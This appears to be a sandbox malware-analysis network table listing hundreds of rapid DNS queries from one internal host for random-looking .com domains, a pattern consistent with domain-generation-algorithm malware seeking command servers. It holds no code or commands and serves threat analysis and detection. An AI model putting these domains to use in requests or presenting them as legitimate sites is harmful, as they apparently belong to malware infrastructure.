                                                                                                                                                                                                              Nov 11, 2024 18:34:13.636034012 CET192.168.2.81.1.1.10x5731Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.636199951 CET192.168.2.81.1.1.10xfd1eStandard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.636653900 CET192.168.2.81.1.1.10xd42dStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641239882 CET192.168.2.81.1.1.10x18c0Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641391993 CET192.168.2.81.1.1.10x6f05Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641581059 CET192.168.2.81.1.1.10xba04Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641741037 CET192.168.2.81.1.1.10xba4Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.642030954 CET192.168.2.81.1.1.10x989fStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.642282963 CET192.168.2.81.1.1.10x22f8Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.646622896 CET192.168.2.81.1.1.10x2428Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.647263050 CET192.168.2.81.1.1.10xb0Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648274899 CET192.168.2.81.1.1.10x79a8Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648654938 CET192.168.2.81.1.1.10x5c12Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648807049 CET192.168.2.81.1.1.10x90e8Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648973942 CET192.168.2.81.1.1.10x4abaStandard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.649132967 CET192.168.2.81.1.1.10xd6eaStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.649296999 CET192.168.2.81.1.1.10xbbc9Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.652892113 CET192.168.2.81.1.1.10x3969Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.657181978 CET192.168.2.81.1.1.10xbdfStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.657481909 CET192.168.2.81.1.1.10x10a4Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.657948971 CET192.168.2.81.1.1.10xf0adStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.661262989 CET192.168.2.81.1.1.10x5ec3Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.661709070 CET192.168.2.81.1.1.10xfd6bStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.662008047 CET192.168.2.81.1.1.10xa067Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.662293911 CET192.168.2.81.1.1.10xf64bStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.663889885 CET192.168.2.81.1.1.10xc599Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.664562941 CET192.168.2.81.1.1.10x697dStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.664844990 CET192.168.2.81.1.1.10x1669Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.665106058 CET192.168.2.81.1.1.10xed0aStandard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.665618896 CET192.168.2.81.1.1.10x7ad8Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.540389061 CET192.168.2.81.1.1.10x832fStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.549957991 CET192.168.2.81.1.1.10x62beStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.550717115 CET192.168.2.81.1.1.10x1ce8Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.552773952 CET192.168.2.81.1.1.10xedf5Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.559453011 CET192.168.2.81.1.1.10xb2d6Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.563673973 CET192.168.2.81.1.1.10x8b9fStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.564868927 CET192.168.2.81.1.1.10x3e55Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.566622972 CET192.168.2.81.1.1.10xa592Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.567322969 CET192.168.2.81.1.1.10xbd1cStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.568162918 CET192.168.2.81.1.1.10x859eStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.568743944 CET192.168.2.81.1.1.10xe63aStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.569766998 CET192.168.2.81.1.1.10x6e42Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.570298910 CET192.168.2.81.1.1.10xbbc1Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.592622042 CET192.168.2.81.1.1.10x5e46Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.594208002 CET192.168.2.81.1.1.10x60eeStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.594378948 CET192.168.2.81.1.1.10xbadStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.596241951 CET192.168.2.81.1.1.10x9a5fStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.599387884 CET192.168.2.81.1.1.10x5b0eStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.658051014 CET192.168.2.81.1.1.10x4820Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.660105944 CET192.168.2.81.1.1.10xe125Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.691828966 CET192.168.2.81.1.1.10x9429Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.698697090 CET192.168.2.81.1.1.10x8350Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.703008890 CET192.168.2.81.1.1.10xc78bStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.703299046 CET192.168.2.81.1.1.10x81cbStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.703843117 CET192.168.2.81.1.1.10x71Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.704716921 CET192.168.2.81.1.1.10x53dbStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.709774971 CET192.168.2.81.1.1.10x2c16Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.710227013 CET192.168.2.81.1.1.10xc4faStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.710963964 CET192.168.2.81.1.1.10x362cStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.715166092 CET192.168.2.81.1.1.10xf3caStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.724684954 CET192.168.2.81.1.1.10xb47bStandard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.729001045 CET192.168.2.81.1.1.10xadd7Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.729688883 CET192.168.2.81.1.1.10x897fStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.731441021 CET192.168.2.81.1.1.10x2904Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.731962919 CET192.168.2.81.1.1.10xe5eaStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.732712030 CET192.168.2.81.1.1.10xf22Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.734580994 CET192.168.2.81.1.1.10x1de3Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.735080957 CET192.168.2.81.1.1.10x8265Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.740946054 CET192.168.2.81.1.1.10x6b57Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.741298914 CET192.168.2.81.1.1.10x2bc5Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.743352890 CET192.168.2.81.1.1.10x161Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.743901014 CET192.168.2.81.1.1.10xe7b5Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.744066954 CET192.168.2.81.1.1.10xdd35Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.747623920 CET192.168.2.81.1.1.10xeb2dStandard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.748172998 CET192.168.2.81.1.1.10x825dStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.748341084 CET192.168.2.81.1.1.10xa767Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.748486042 CET192.168.2.81.1.1.10xbe6eStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.756458044 CET192.168.2.81.1.1.10x4411Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.757082939 CET192.168.2.81.1.1.10x678fStandard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.757317066 CET192.168.2.81.1.1.10x7b35Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.758117914 CET192.168.2.81.1.1.10xb605Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.758339882 CET192.168.2.81.1.1.10xe569Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.759351015 CET192.168.2.81.1.1.10xb034Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.759418011 CET192.168.2.81.1.1.10x59d5Standard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.759567976 CET192.168.2.81.1.1.10x3106Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.759658098 CET192.168.2.81.1.1.10x971aStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.759744883 CET192.168.2.81.1.1.10xab1eStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.759856939 CET192.168.2.81.1.1.10x92eaStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.765557051 CET192.168.2.81.1.1.10x744dStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.766027927 CET192.168.2.81.1.1.10x876aStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.766323090 CET192.168.2.81.1.1.10x8b44Standard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.768739939 CET192.168.2.81.1.1.10x46dStandard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.769733906 CET192.168.2.81.1.1.10xe206Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.770621061 CET192.168.2.81.1.1.10x4e77Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.322016954 CET192.168.2.81.1.1.10x37deStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.324963093 CET192.168.2.81.1.1.10x3f0eStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.328448057 CET192.168.2.81.1.1.10xe393Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.330215931 CET192.168.2.81.1.1.10xb0a0Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.350450039 CET192.168.2.81.1.1.10xaf85Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.356225967 CET192.168.2.81.1.1.10xe14cStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.361968040 CET192.168.2.81.1.1.10xf188Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.364183903 CET192.168.2.81.1.1.10x9583Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.365192890 CET192.168.2.81.1.1.10x7c14Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.367383003 CET192.168.2.81.1.1.10x3e4aStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.369715929 CET192.168.2.81.1.1.10xab64Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.370390892 CET192.168.2.81.1.1.10x98bStandard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.372675896 CET192.168.2.81.1.1.10x97deStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.374686003 CET192.168.2.81.1.1.10xb590Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.375700951 CET192.168.2.81.1.1.10x226Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.376104116 CET192.168.2.81.1.1.10x53f7Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.377814054 CET192.168.2.81.1.1.10x7aaaStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.379400015 CET192.168.2.81.1.1.10x78caStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.381001949 CET192.168.2.81.1.1.10x37dcStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.388550997 CET192.168.2.81.1.1.10x5e0aStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.395468950 CET192.168.2.81.1.1.10xc36dStandard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.395828009 CET192.168.2.81.1.1.10x8a68Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.396598101 CET192.168.2.81.1.1.10x67e6Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.396770000 CET192.168.2.81.1.1.10x2b08Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.397253990 CET192.168.2.81.1.1.10xec30Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.408967018 CET192.168.2.81.1.1.10x4f79Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.409343004 CET192.168.2.81.1.1.10x94b3Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.409559965 CET192.168.2.81.1.1.10x6e70Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.409691095 CET192.168.2.81.1.1.10x996cStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.409898996 CET192.168.2.81.1.1.10x9b76Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.410011053 CET192.168.2.81.1.1.10x88b9Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.410154104 CET192.168.2.81.1.1.10xe4faStandard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.412833929 CET192.168.2.81.1.1.10xc82bStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.412857056 CET192.168.2.81.1.1.10x9ab0Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.432420969 CET192.168.2.81.1.1.10xf0f7Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.438290119 CET192.168.2.81.1.1.10x404eStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.439821005 CET192.168.2.81.1.1.10xb37dStandard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.440510035 CET192.168.2.81.1.1.10x7c0aStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.441951990 CET192.168.2.81.1.1.10x4087Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.442447901 CET192.168.2.81.1.1.10x7b21Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.447721958 CET192.168.2.81.1.1.10xea6bStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.448275089 CET192.168.2.81.1.1.10x42b3Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.448601961 CET192.168.2.81.1.1.10x61d5Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.448807955 CET192.168.2.81.1.1.10xd150Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.465482950 CET192.168.2.81.1.1.10x3bc4Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.466701031 CET192.168.2.81.1.1.10x6db8Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.466887951 CET192.168.2.81.1.1.10x511cStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.467354059 CET192.168.2.81.1.1.10x7d14Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.467528105 CET192.168.2.81.1.1.10x6350Standard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.468280077 CET192.168.2.81.1.1.10x81baStandard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.468426943 CET192.168.2.81.1.1.10xcdeStandard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.468496084 CET192.168.2.81.1.1.10xc9b6Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.468622923 CET192.168.2.81.1.1.10x81eStandard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.472021103 CET192.168.2.81.1.1.10xf8daStandard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.714453936 CET192.168.2.81.1.1.10x2f00Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.714593887 CET192.168.2.81.1.1.10xc268Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.714970112 CET192.168.2.81.1.1.10xdcaStandard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.715399027 CET192.168.2.81.1.1.10x632fStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.079075098 CET192.168.2.81.1.1.10x9873Standard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.084775925 CET192.168.2.81.1.1.10xd4a1Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.091438055 CET192.168.2.81.1.1.10xcc85Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.091842890 CET192.168.2.81.1.1.10x1722Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.092205048 CET192.168.2.81.1.1.10x7b6dStandard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.092452049 CET192.168.2.81.1.1.10x53ddStandard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.429385900 CET192.168.2.81.1.1.10xb36aStandard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.429760933 CET192.168.2.81.1.1.10xca59Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.430373907 CET192.168.2.81.1.1.10xf55fStandard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435157061 CET192.168.2.81.1.1.10xc7eStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435189009 CET192.168.2.81.1.1.10x3015Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435658932 CET192.168.2.81.1.1.10x149Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435761929 CET192.168.2.81.1.1.10x7ad9Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.439023972 CET192.168.2.81.1.1.10xaedeStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.439533949 CET192.168.2.81.1.1.10xfddaStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.441364050 CET192.168.2.81.1.1.10x98e9Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.441397905 CET192.168.2.81.1.1.10x46f3Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.441823006 CET192.168.2.81.1.1.10x7c8eStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.442248106 CET192.168.2.81.1.1.10x1252Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.443013906 CET192.168.2.81.1.1.10x21adStandard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.447999954 CET192.168.2.81.1.1.10x20afStandard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.456149101 CET192.168.2.81.1.1.10xf738Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.456224918 CET192.168.2.81.1.1.10xcd48Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.457623005 CET192.168.2.81.1.1.10x600eStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.464351892 CET192.168.2.81.1.1.10x844fStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466145039 CET192.168.2.81.1.1.10x588fStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.468462944 CET192.168.2.81.1.1.10xe2fdStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.468775988 CET192.168.2.81.1.1.10xb0eaStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.468974113 CET192.168.2.81.1.1.10x73a0Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.474081993 CET192.168.2.81.1.1.10x34b2Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.474641085 CET192.168.2.81.1.1.10xb6e6Standard query (0)vojycit.comA (IP address)IN (0x0001)false
